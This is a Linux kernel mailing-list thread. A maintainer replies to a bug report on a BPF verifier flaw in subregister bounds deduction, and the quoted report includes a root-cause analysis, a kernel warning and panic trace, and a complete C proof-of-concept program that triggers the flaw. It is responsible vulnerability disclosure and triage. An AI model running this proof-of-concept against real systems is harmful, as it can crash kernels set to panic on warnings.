From: Paul Chaignon <paul.chaignon@gmail.com>
To: 梅开彦 <kaiyanm@hust.edu.cn>
Cc: ast@kernel.org, daniel@iogearbox.net, john.fastabend@gmail.com,
bpf@vger.kernel.org, dddddd@hust.edu.cn, dzm91@hust.edu.cn
Subject: Re: BPF verifier missing range intersection validation in subregister bounds deduction
Date: Fri, 17 Oct 2025 16:58:59 +0200 [thread overview]
Message-ID: <aPJZs5h7ihqOb-e6@mail.gmail.com> (raw)
In-Reply-To: <1881f0f5.300df.199f2576a01.Coremail.kaiyanm@hust.edu.cn>
Hi,
Syzbot has been reporting the same warning for a while now [1, 2].
Different programs can cause this, but they all follow the same pattern
so far, with a reg_bounds_sync trying to improve register bounds while
walking an impossible branch. Your example (reproduced below) has the
same pattern, with the impossible branch when the condition at
instruction 4 is true. The verifier then tries to improve the bounds of
true_reg1 (r0) on the incorrect assumption that r0 > r0.
0: R1=ctx() R10=fp0
0: call bpf_get_prandom_u32#7 ; R0=scalar()
1: r8 = 0x80000000 ; R8=0x80000000
3: r0 &= r8 ; R0=scalar(smin=0,smax=umax=umax32=0x80000000,smax32=0,var_off=(0x0; 0x80000000)) R8=0x80000000
4: if r0 > r0 goto pc+1
verifier bug: REG INVARIANTS VIOLATION (true_reg1): range bounds violation u64=[0x1, 0x0] s64=[0x1, 0x0] u32=[0x1, 0x0] s32=[0x1, 0x0] var_off=(0x0, 0x0)
Eduard is working on a solution to these invariant violation warnings
that should address all cases we've seen so far (cf. [3, 4]).
1 - https://syzkaller.appspot.com/bug?extid=c711ce17dd78e5d4fdcf
2 - https://syzkaller.appspot.com/bug?extid=c950cc277150935cc0b5
3 - https://lore.kernel.org/all/20250913222323.894182-1-kriish.sharma2006@gmail.com/T/#mda9630e3c70d333e9e0bb8bf0cee0c853771d1c1
4 - https://lore.kernel.org/all/cf36f407713920055fcee1e30c007d23a117e712.camel@gmail.com/
Paul
On Fri, Oct 17, 2025 at 09:23:59PM +0800, 梅开彦 wrote:
> Our fuzzer discovered a register value simulation error in the BPF verifier within
>
> the Linux kernel's BPF subsystem. This vulnerability causes invalid register value
>
> range where the minimum value exceeds the maximum value and will lead to a WARNING issue.
>
>
> Reported-by: Kaiyan Mei <M202472210@hust.edu.cn>
> Reported-by: Yinhao Hu <dddddd@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dzm91@hust.edu.cn>
>
> ## Root Cause
>
>
>
> The vulnerability occurs when the BPF verifier attempts to merge incompatible u32
>
> and s32 ranges in the `__reg32_deduce_bounds()` function. When processing ranges
>
> with no overlap, the function produces invalid ranges where the minimum value exceeds
>
> the maximum value.
>
>
> ```c
> if ((s32)reg->u32_min_value <= (s32)reg->u32_max_value) {
> reg->s32_min_value = max_t(s32, reg->s32_min_value, reg->u32_min_value);
> reg->s32_max_value = min_t(s32, reg->s32_max_value, reg->u32_max_value);
> }
> if ((u32)reg->s32_min_value <= (u32)reg->s32_max_value) {
> reg->u32_min_value = max_t(u32, reg->s32_min_value, reg->u32_min_value);
> reg->u32_max_value = min_t(u32, reg->s32_max_value, reg->u32_max_value);
> }
> ```
>
> Specifically, when the verifier processes:
>
> - s32 range: `[-2147483648, 0]`
>
> - u32 range: `[1, 2147483647]`
>
>
>
> The merging logic incorrectly assumes these ranges can be intersected, resulting in
>
> an invalid combined range `[1, 0]` where the minimum value exceeds the maximum value.
>
>
>
> ## Reproduction Steps
>
> 1. **BPF Program**: Load BPF program containing helper calls and ALU operations
> - helper calls and ALU operations would create uncertain register value ranges
>
> 2. **Verifier**: merge incompatible u32 and s32 ranges in the `__reg32_deduce_bounds()` function
> - s32 range: `[-2147483648, 0]`
> - u32 range: `[1, 2147483647]`
>
>
>
> 3. **Crash**: Invalid range `[1, 0]` is produced and detected by `reg_bounds_sanity_check()`,
>
> triggering WARNING
>
>
> ## KASAN Report
>
> ```
> [ 95.792587][ T9903] ------------[ cut here ]------------
> [ 95.792811][ T9903] verifier bug: REG INVARIANTS VIOLATION (true_reg1): range bounds violation u64=[0x1, 0x0] s64=[0x1, 0x0] u32=[0x1, 0x0] )
> [ 95.793459][ T9903] WARNING: kernel/bpf/verifier.c:2731 at reg_bounds_sanity_check+0x66e/0x11e0, CPU#1: poc/9903
> [ 95.793889][ T9903] Modules linked in:
> [ 95.794053][ T9903] CPU: 1 UID: 0 PID: 9903 Comm: poc Not tainted 6.18.0-rc1-next-20251013-dirty #8 PREEMPT(full)
> [ 95.794476][ T9903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> [ 95.794846][ T9903] RIP: 0010:reg_bounds_sanity_check+0x66e/0x11e0
> [ 95.795106][ T9903] Code: c7 c7 e0 68 55 8b 48 8b 95 58 ff ff ff 50 8b 45 ac 48 8b b5 60 ff ff ff 50 8b 45 b4 50 8b 45 b0 50 ff 75 b8 e8 63 0
> [ 95.795877][ T9903] RSP: 0018:ffffc90004b2f2a0 EFLAGS: 00010282
> [ 95.796157][ T9903] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff81789f69
> [ 95.796480][ T9903] RDX: ffff888108941e80 RSI: ffffffff81789f76 RDI: 0000000000000001
> [ 95.796798][ T9903] RBP: ffffc90004b2f398 R08: 0000000000000001 R09: ffffed1026bc4841
> [ 95.797116][ T9903] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001
> [ 95.797437][ T9903] R13: ffff88810a0da04c R14: ffff88810a0da054 R15: ffff88810a0da000
> [ 95.797755][ T9903] FS: 00007ff3462f4740(0000) GS:ffff8881a1ace000(0000) knlGS:0000000000000000
> [ 95.798110][ T9903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 95.798383][ T9903] CR2: 00002000000009c0 CR3: 0000000111fde000 CR4: 0000000000752ef0
> [ 95.798700][ T9903] PKRU: 55555554
> [ 95.798845][ T9903] Call Trace:
> [ 95.798981][ T9903] <TASK>
> [ 95.799104][ T9903] reg_set_min_max+0x18a/0x2c0
> [ 95.799301][ T9903] check_cond_jmp_op+0x2ccf/0x6880
> [ 95.799515][ T9903] ? __pfx_check_cond_jmp_op+0x10/0x10
> [ 95.799738][ T9903] ? check_alu_op+0x7b9/0x3880
> [ 95.799936][ T9903] ? commit_stack_write_marks.isra.0+0x2f9/0x450
> [ 95.800195][ T9903] do_check_common+0x7b3e/0xb9e0
> [ 95.800402][ T9903] ? compute_live_registers+0xabd/0x1040
> [ 95.800633][ T9903] ? mark_fastcall_pattern_for_call+0x5e4/0x750
> [ 95.800887][ T9903] ? __pfx_compute_live_registers+0x10/0x10
> [ 95.801127][ T9903] ? __pfx_do_check_common+0x10/0x10
> [ 95.801344][ T9903] ? __pfx_mark_fastcall_pattern_for_call+0x10/0x10
> [ 95.801610][ T9903] ? bpf_check+0x8ec1/0xbae0
> [ 95.801801][ T9903] bpf_check+0x9288/0xbae0
> [ 95.801987][ T9903] ? __pfx_bpf_check+0x10/0x10
> [ 95.802184][ T9903] ? __asan_memset+0x24/0x50
> [ 95.802379][ T9903] ? bpf_obj_name_cpy+0x148/0x1b0
> [ 95.802585][ T9903] bpf_prog_load+0x17b0/0x2770
> [ 95.802781][ T9903] ? __pfx_bpf_prog_load+0x10/0x10
> [ 95.802991][ T9903] ? __might_fault+0x138/0x190
> [ 95.803188][ T9903] ? __might_fault+0xe0/0x190
> [ 95.803385][ T9903] __sys_bpf+0x1964/0x5360
> [ 95.803568][ T9903] ? __pfx___sys_bpf+0x10/0x10
> [ 95.803765][ T9903] ? __lock_acquire+0x636/0x1be0
> [ 95.803971][ T9903] ? css_rstat_updated+0x1c2/0x510
> [ 95.804181][ T9903] ? __pfx_css_rstat_updated+0x10/0x10
> [ 95.804407][ T9903] __x64_sys_bpf+0x78/0xc0
> [ 95.804590][ T9903] ? lockdep_hardirqs_on+0x7c/0x110
> [ 95.804811][ T9903] do_syscall_64+0xcb/0xfa0
> [ 95.804999][ T9903] entry_SYSCALL_64_after_hwframe+0x77/0x7f
> [ 95.805239][ T9903] RIP: 0033:0x7ff3463f87d9
> [ 95.805422][ T9903] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 8
> [ 95.806195][ T9903] RSP: 002b:00007ffe5dbb5768 EFLAGS: 00000246 ORIG_RAX: 0000000000000141
> [ 95.806531][ T9903] RAX: ffffffffffffffda RBX: 00007ffe5dbb5888 RCX: 00007ff3463f87d9
> [ 95.806846][ T9903] RDX: 0000000000000094 RSI: 00002000000009c0 RDI: 0000000000000005
> [ 95.807162][ T9903] RBP: 00007ffe5dbb5770 R08: 0000000000000000 R09: 0000000000000001
> [ 95.807479][ T9903] R10: ffffffffffffffff R11: 0000000000000246 R12: 0000000000000000
> [ 95.807795][ T9903] R13: 00007ffe5dbb5898 R14: 000055c3a043edd8 R15: 00007ff346519020
> [ 95.808116][ T9903] </TASK>
> [ 95.808244][ T9903] Kernel panic - not syncing: kernel: panic_on_warn set ...
> [ 95.808535][ T9903] CPU: 1 UID: 0 PID: 9903 Comm: poc Not tainted 6.18.0-rc1-next-20251013-dirty #8 PREEMPT(full)
> [ 95.808951][ T9903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> [ 95.809312][ T9903] Call Trace:
> [ 95.809448][ T9903] <TASK>
> [ 95.809569][ T9903] dump_stack_lvl+0x3d/0x1b0
> [ 95.809760][ T9903] vpanic+0x679/0x710
> [ 95.809927][ T9903] ? reg_bounds_sanity_check+0x66e/0x11e0
> [ 95.810159][ T9903] panic+0xc2/0xd0
> [ 95.810314][ T9903] ? __pfx_panic+0x10/0x10
> [ 95.810500][ T9903] ? check_panic_on_warn+0x1f/0xc0
> [ 95.810709][ T9903] check_panic_on_warn+0xb1/0xc0
> [ 95.810911][ T9903] __warn+0x108/0x3f0
> [ 95.811075][ T9903] ? reg_bounds_sanity_check+0x66e/0x11e0
> [ 95.811307][ T9903] report_bug+0x2e1/0x500
> [ 95.811488][ T9903] ? reg_bounds_sanity_check+0x66e/0x11e0
> [ 95.811720][ T9903] handle_bug+0x2dd/0x410
> [ 95.811900][ T9903] exc_invalid_op+0x35/0x80
> [ 95.812087][ T9903] asm_exc_invalid_op+0x1a/0x20
> [ 95.812287][ T9903] RIP: 0010:reg_bounds_sanity_check+0x66e/0x11e0
> [ 95.812544][ T9903] Code: c7 c7 e0 68 55 8b 48 8b 95 58 ff ff ff 50 8b 45 ac 48 8b b5 60 ff ff ff 50 8b 45 b4 50 8b 45 b0 50 ff 75 b8 e8 63 0
> [ 95.813309][ T9903] RSP: 0018:ffffc90004b2f2a0 EFLAGS: 00010282
> [ 95.813556][ T9903] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff81789f69
> [ 95.813873][ T9903] RDX: ffff888108941e80 RSI: ffffffff81789f76 RDI: 0000000000000001
> [ 95.814188][ T9903] RBP: ffffc90004b2f398 R08: 0000000000000001 R09: ffffed1026bc4841
> [ 95.814506][ T9903] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001
> [ 95.814821][ T9903] R13: ffff88810a0da04c R14: ffff88810a0da054 R15: ffff88810a0da000
> [ 95.815138][ T9903] ? __warn_printk+0x179/0x310
> [ 95.815337][ T9903] ? __warn_printk+0x186/0x310
> [ 95.815536][ T9903] reg_set_min_max+0x18a/0x2c0
> [ 95.815733][ T9903] check_cond_jmp_op+0x2ccf/0x6880
> [ 95.815944][ T9903] ? __pfx_check_cond_jmp_op+0x10/0x10
> [ 95.816168][ T9903] ? check_alu_op+0x7b9/0x3880
> [ 95.816366][ T9903] ? commit_stack_write_marks.isra.0+0x2f9/0x450
> [ 95.816625][ T9903] do_check_common+0x7b3e/0xb9e0
> [ 95.816830][ T9903] ? compute_live_registers+0xabd/0x1040
> [ 95.817060][ T9903] ? mark_fastcall_pattern_for_call+0x5e4/0x750
> [ 95.817313][ T9903] ? __pfx_compute_live_registers+0x10/0x10
> [ 95.817554][ T9903] ? __pfx_do_check_common+0x10/0x10
> [ 95.817773][ T9903] ? __pfx_mark_fastcall_pattern_for_call+0x10/0x10
> [ 95.818042][ T9903] ? bpf_check+0x8ec1/0xbae0
> [ 95.818235][ T9903] bpf_check+0x9288/0xbae0
> [ 95.818426][ T9903] ? __pfx_bpf_check+0x10/0x10
> [ 95.818628][ T9903] ? __asan_memset+0x24/0x50
> [ 95.818820][ T9903] ? bpf_obj_name_cpy+0x148/0x1b0
> [ 95.819027][ T9903] bpf_prog_load+0x17b0/0x2770
> [ 95.819225][ T9903] ? __pfx_bpf_prog_load+0x10/0x10
> [ 95.819437][ T9903] ? __might_fault+0x138/0x190
> [ 95.819638][ T9903] ? __might_fault+0xe0/0x190
> [ 95.819836][ T9903] __sys_bpf+0x1964/0x5360
> [ 95.820020][ T9903] ? __pfx___sys_bpf+0x10/0x10
> [ 95.820217][ T9903] ? __lock_acquire+0x636/0x1be0
> [ 95.820423][ T9903] ? css_rstat_updated+0x1c2/0x510
> [ 95.820634][ T9903] ? __pfx_css_rstat_updated+0x10/0x10
> [ 95.820859][ T9903] __x64_sys_bpf+0x78/0xc0
> [ 95.821042][ T9903] ? lockdep_hardirqs_on+0x7c/0x110
> [ 95.821255][ T9903] do_syscall_64+0xcb/0xfa0
> [ 95.821444][ T9903] entry_SYSCALL_64_after_hwframe+0x77/0x7f
> [ 95.821683][ T9903] RIP: 0033:0x7ff3463f87d9
> [ 95.821865][ T9903] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 8
> [ 95.822630][ T9903] RSP: 002b:00007ffe5dbb5768 EFLAGS: 00000246 ORIG_RAX: 0000000000000141
> [ 95.822966][ T9903] RAX: ffffffffffffffda RBX: 00007ffe5dbb5888 RCX: 00007ff3463f87d9
> [ 95.823283][ T9903] RDX: 0000000000000094 RSI: 00002000000009c0 RDI: 0000000000000005
> [ 95.823601][ T9903] RBP: 00007ffe5dbb5770 R08: 0000000000000000 R09: 0000000000000001
> [ 95.823918][ T9903] R10: ffffffffffffffff R11: 0000000000000246 R12: 0000000000000000
> [ 95.824235][ T9903] R13: 00007ffe5dbb5898 R14: 000055c3a043edd8 R15: 00007ff346519020
> [ 95.824557][ T9903] </TASK>
> ```
>
> ## Proof of Concept
>
> The following C program should demonstrate the vulnerability on linux-next 6.18.0-rc1-next-20251013:
>
> ```c
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <unistd.h>
> #include <linux/bpf.h>
>
> #ifndef __NR_bpf
> #define __NR_bpf 321
> #endif
>
> #define BPF_JMP32_REG(OP, DST, SRC, OFF) \
> ((struct bpf_insn) { \
> .code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
> .dst_reg = DST, \
> .src_reg = SRC, \
> .off = OFF, \
> .imm = 0 })
>
>
> #define BPF_EXIT_INSN() \
> ((struct bpf_insn) { \
> .code = BPF_JMP | BPF_EXIT, \
> .dst_reg = 0, \
> .src_reg = 0, \
> .off = 0, \
> .imm = 0 })
>
> #define BPF_EMIT_CALL(FUNC) \
> ((struct bpf_insn) { \
> .code = BPF_JMP | BPF_CALL, \
> .dst_reg = 0, \
> .src_reg = 0, \
> .off = 0, \
> .imm = ((FUNC) - BPF_FUNC_unspec) })
>
> #define BPF_LD_IMM64(DST, IMM) \
> BPF_LD_IMM64_RAW(DST, 0, IMM)
>
> #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
> ((struct bpf_insn) { \
> .code = BPF_LD | BPF_DW | BPF_IMM, \
> .dst_reg = DST, \
> .src_reg = SRC, \
> .off = 0, \
> .imm = (__u32) (IMM) }), \
> ((struct bpf_insn) { \
> .code = 0, /* zero is reserved opcode */ \
> .dst_reg = 0, \
> .src_reg = 0, \
> .off = 0, \
> .imm = ((__u64) (IMM)) >> 32 })
>
> #define BPF_ALU64_REG(OP, DST, SRC) \
> ((struct bpf_insn) { \
> .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
> .dst_reg = DST, \
> .src_reg = SRC, \
> .off = 0, \
> .imm = 0 })
>
> static inline uint64_t ptr_to_u64(const void *ptr) {
> return (uint64_t)(unsigned long)ptr;
> }
>
> static int load_prog(struct bpf_insn *insns, size_t cnt) {
> union bpf_attr attr = {
> .prog_type = 4,
> .insns = ptr_to_u64(insns),
> .insn_cnt = cnt,
> .license = ptr_to_u64("GPL"),
> };
> int prog_fd=syscall(__NR_bpf, 5, &attr, sizeof(attr));
> return prog_fd;
> }
>
>
> int main(void)
> {
> struct bpf_insn prog[] = {
> BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
> BPF_LD_IMM64(BPF_REG_8, 0x80000000),
> BPF_ALU64_REG(BPF_AND, BPF_REG_0, BPF_REG_8),
> BPF_JMP32_REG(BPF_JGT, BPF_REG_0, BPF_REG_0, 1),
> BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
> BPF_EXIT_INSN(),
> };
> int fd=load_prog(prog, sizeof(prog) / sizeof(prog[0]));
> printf("fd=%d\n size=%zu\n", fd, sizeof(prog) / sizeof(prog[0]));
> }
>
>
> ```
>
> ## Kernel Configuration Requirements for Reproduction
>
> The vulnerability can be triggered with the kernel config in the attachment.
prev parent reply other threads:[~2025-10-17 14:59 UTC|newest]
Thread overview: 2+ messages / expand[flat|nested] mbox.gz Atom feed top
2025-10-17 13:23 BPF verifier missing range intersection validation in subregister bounds deduction 梅开彦
2025-10-17 14:58 ` Paul Chaignon [this message]
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=aPJZs5h7ihqOb-e6@mail.gmail.com \
--to=paul.chaignon@gmail.com \
--cc=ast@kernel.org \
--cc=bpf@vger.kernel.org \
--cc=daniel@iogearbox.net \
--cc=dddddd@hust.edu.cn \
--cc=dzm91@hust.edu.cn \
--cc=john.fastabend@gmail.com \
--cc=kaiyanm@hust.edu.cn \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox